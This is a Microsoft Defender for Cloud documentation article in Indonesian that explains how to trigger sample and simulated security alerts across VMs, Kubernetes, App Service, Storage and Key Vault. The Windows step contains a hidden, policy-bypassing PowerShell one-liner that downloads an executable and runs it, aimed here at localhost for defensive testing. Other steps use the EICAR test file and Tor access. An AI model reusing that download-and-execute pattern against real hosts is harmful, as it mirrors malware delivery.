Bagikan melalui

Memvalidasi pemberitahuan di Microsoft Defender untuk Cloud

  • Artikel

Artikel ini menjelaskan cara memvalidasi bahwa sistem Anda dikonfigurasi dengan benar untuk pemberitahuan Microsoft Defender untuk Cloud, memastikan Anda dapat memantau dan merespons ancaman keamanan secara efektif.

Apa yang dimaksud dengan pemberitahuan keamanan?

Pemberitahuan adalah pemberitahuan yang Defender untuk Cloud hasilkan saat mendeteksi ancaman pada sumber daya Anda. Security Center memprioritaskan dan mencantumkan pemberitahuan, beserta informasi yang diperlukan agar Anda dapat menyelidiki masalah dengan cepat. Defender untuk Cloud juga memberikan rekomendasi untuk memulihkan serangan.

Untuk informasi selengkapnya, lihat Pemberitahuan keamanan di Defender untuk Cloud dan Mengelola serta merespons pemberitahuan keamanan.

Prasyarat

Untuk menerima semua pemberitahuan, komputer Anda dan ruang kerja Analitik Log yang terhubung harus berada di penyewa yang sama.

Buat contoh peringatan keamanan

Jika Anda menggunakan pengalaman pemberitahuan pratinjau baru seperti yang dijelaskan dalam Mengelola dan merespons pemberitahuan keamanan di Microsoft Defender untuk Cloud, Anda dapat membuat contoh pemberitahuan dari halaman pemberitahuan keamanan di portal Azure.

Gunakan pemberitahuan sampel untuk:

  • Evaluasi nilai dan kemampuan paket Pertahanan Microsoft Anda.
  • Validasi konfigurasi apa pun yang telah Anda buat untuk pemberitahuan keamanan Anda (seperti integrasi SIEM, otomatisasi alur kerja, dan pemberitahuan email).

Untuk membuat pemberitahuan sampel:

  1. Sebagai pengguna dengan peran Kontributor Langganan, dari toolbar di halaman pemberitahuan keamanan, pilih Contoh pemberitahuan.
  2. Pilih langganan.
  3. Pilih paket Pertahanan Microsoft yang relevan yang ingin Anda lihat pemberitahuannya.
  4. Pilih Buat pemberitahuan sampel.

Cuplikan layar memperlihatkan langkah-langkah untuk membuat contoh pemberitahuan di Microsoft Defender untuk Cloud.

Pemberitahuan muncul yang memberi tahu Anda bahwa pemberitahuan sampel dibuat:

Cuplikan layar memperlihatkan pemberitahuan bahwa contoh pemberitahuan sedang dibuat.

Setelah beberapa menit, pemberitahuan muncul di halaman pemberitahuan keamanan. Mereka juga muncul di tempat lain yang telah Anda konfigurasi untuk menerima pemberitahuan keamanan Microsoft Defender untuk Cloud Anda (SIEM yang terhubung, pemberitahuan email, dan sebagainya).

Cuplikan layar memperlihatkan contoh pemberitahuan dalam daftar pemberitahuan keamanan.

Tip

Pemberitahuan tersebut adalah untuk sumber daya yang disimulasikan.

Mensimulasikan pemberitahuan di Azure VM (Windows) Anda

Setelah agen Microsoft Defender untuk Titik Akhir diinstal pada komputer Anda sebagai bagian dari integrasi Defender for Servers, ikuti langkah-langkah ini dari komputer tempat Anda ingin menjadi sumber daya pemberitahuan yang diserang.

Buka prompt baris perintah yang ditingkatkan pada perangkat dan jalankan skrip:

  1. Buka Mulai dan ketik cmd.

  2. Pilih kanan Prompt Perintah dan pilih Jalankan sebagai administrator.

    Cuplikan layar memperlihatkan tempat untuk memilih Jalankan sebagai Administrator.

  3. Pada prompt, salin dan jalankan perintah berikut: powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\test-MDATP-test\invoice.exe');Start-Process 'C:\test-MDATP-test\invoice.exe'.

  4. Jendela Prompt Perintah ditutup secara otomatis. Jika berhasil, pemberitahuan baru akan muncul di bilah Pemberitahuan Defender untuk Cloud dalam 10 menit.

  5. Baris pesan dalam kotak PowerShell akan muncul mirip dengan bagaimana baris pesan disajikan di sini:

    Cuplikan layar memperlihatkan baris pesan PowerShell.

Atau, Anda dapat menggunakan string uji EICAR untuk melakukan pengujian ini: Membuat file teks, menempelkan baris EICAR, dan menyimpan file sebagai file yang dapat dieksekusi ke drive lokal komputer Anda.

Catatan

Saat meninjau pemberitahuan pengujian untuk Windows, pastikan Anda mengaktifkan Pertahanan untuk Titik Akhir dengan perlindungan Real Time. Pelajari cara memvalidasi konfigurasi ini.

Mensimulasikan pemberitahuan di Azure VM (Linux) Anda

Setelah agen Microsoft Defender untuk Titik Akhir diinstal pada komputer Anda sebagai bagian dari integrasi Defender for Servers, ikuti langkah-langkah ini dari komputer yang Ingin Anda jadikan sumber daya pemberitahuan yang diserang:

  1. Buka jendela Terminal, salin dan jalankan perintah berikut: curl -O https://secure.eicar.org/eicar.com.txt
  2. Jendela Prompt Perintah ditutup secara otomatis. Jika berhasil, pemberitahuan baru akan muncul di bilah Pemberitahuan Defender untuk Cloud dalam 10 menit.

Catatan

Saat meninjau pemberitahuan pengujian untuk Linux, pastikan Anda mengaktifkan Pertahanan untuk Titik Akhir dengan perlindungan Real Time. Pelajari cara memvalidasi konfigurasi ini.

Mensimulasikan pemberitahuan di Kubernetes

Defender untuk Kontainer menyediakan pemberitahuan keamanan untuk kluster Anda dan node kluster yang mendasar. Ini mencapai ini dengan memantau sarana kontrol (server API) dan beban kerja kontainer.

Anda dapat mensimulasikan pemberitahuan untuk sarana kontrol dan beban kerja menggunakan alat simulasi pemberitahuan Kubernetes.

Pelajari selengkapnya tentang mempertahankan node dan kluster Kubernetes Anda dengan Pertahanan Microsoft untuk Kontainer.

Mensimulasikan pemberitahuan untuk App Service

Anda dapat mensimulasikan pemberitahuan untuk sumber daya yang berjalan di App Service.

  1. Buat situs web baru dan tunggu 24 jam untuk mendaftar dengan Defender untuk Cloud, atau gunakan situs web yang sudah ada.
  2. Setelah situs web dibuat, akses dengan menggunakan URL berikut:

    1. Buka panel sumber daya layanan aplikasi dan salin domain untuk URL dari bidang domain default.

      Cuplikan layar memperlihatkan tempat menyalin domain default.

    2. Salin nama situs web ke dalam URL: https://<website-name>.azurewebsites.net/This_Will_Generate_ASC_Alert.

  3. Pemberitahuan dihasilkan dalam waktu sekitar 1 hingga 2 jam.

Mensimulasikan pemberitahuan untuk Storage ATP (Perlindungan Ancaman Tingkat Lanjut)

  1. Navigasi ke akun penyimpanan yang mengaktifkan Azure Defender for Storage.

  2. Pilih tab Kontainer di bar samping.

    Cuplikan layar memperlihatkan tempat menavigasi untuk memilih kontainer.

  3. Navigasikan ke kontainer yang sudah ada atau buat kontainer baru.

  4. Unggah berkas ke kontainer itu. Hindari mengunggah file apa pun yang mungkin berisi data sensitif.

    Cuplikan layar memperlihatkan tempat mengunggah file ke kontainer.

  5. Pilih kanan file yang diunggah dan pilih Buat SAS.

  6. Pilih tombol Token DAN URL SAS yang Dihasilkan (tidak perlu mengubah opsi apa pun).

  7. Salin URL SAS yang telah dibuat.

  8. Buka browser Tor, yang dapat Anda unduh di sini.

  9. Di browser Tor, buka URL SAS. Anda sekarang akan melihat dan dapat mengunduh file yang diunggah.

Menguji pemberitahuan AppServices

Untuk mensimulasikan pemberitahuan EICAR layanan aplikasi:

  1. Temukan titik akhir HTTP situs web baik dengan masuk ke bilah portal Azure untuk situs web App Services atau menggunakan entri DNS kustom yang terkait dengan situs web ini. (Titik akhir URL default untuk situs web Azure App Services memiliki akhiran https://XXXXXXX.azurewebsites.net). Situs web harus berupa situs web yang ada dan bukan situs web yang dibuat sebelum simulasi pemberitahuan.
  2. Temukan titik akhir HTTP situs web baik dengan masuk ke bilah portal Azure untuk situs web App Services atau menggunakan entri DNS kustom yang terkait dengan situs web ini. (Titik akhir URL default untuk situs web Azure App Services memiliki akhiran https://XXXXXXX.azurewebsites.net). Situs web harus berupa situs web yang ada dan bukan situs web yang dibuat sebelum simulasi pemberitahuan.
  3. Telusuri ke URL situs web dan tambahkan akhiran tetap berikut: /This_Will_Generate_ASC_Alert. URL akan terlihat seperti ini: https://XXXXXXX.azurewebsites.net/This_Will_Generate_ASC_Alert. Mungkin perlu beberapa waktu agar pemberitahuan dihasilkan (~1,5 jam).

Memvalidasi Deteksi Ancaman Azure Key Vault

  1. Jika Anda belum membuat Key Vault, pastikan untuk membuatnya.
  2. Setelah membuat Key Vault dan rahasia, buka VM yang memiliki akses internet dan unduh ToR Browser.
  3. Instal Browser TOR di VM Anda.
  4. Setelah penginstalan, buka browser reguler Anda, masuk ke portal Azure, dan akses halaman Key Vault. Pilih URL yang disorot dan salin alamat.
  5. Buka TOR dan tempelKAN URL ini (Anda perlu mengautentikasi lagi untuk mengakses portal Azure).
  6. Setelah mengakses, Anda juga dapat memilih opsi Rahasia di panel kiri.
  7. Di Browser TOR, keluar dari portal Azure dan tutup browser.
  8. Setelah beberapa waktu, Defender untuk Key Vault memicu pemberitahuan dengan informasi terperinci tentang aktivitas mencurigakan ini.

Langkah berikutnya

Artikel ini memperkenalkan Anda pada proses validasi pemberitahuan. Setelah Anda terbiasa dengan validasi ini, jelajahi artikel berikut: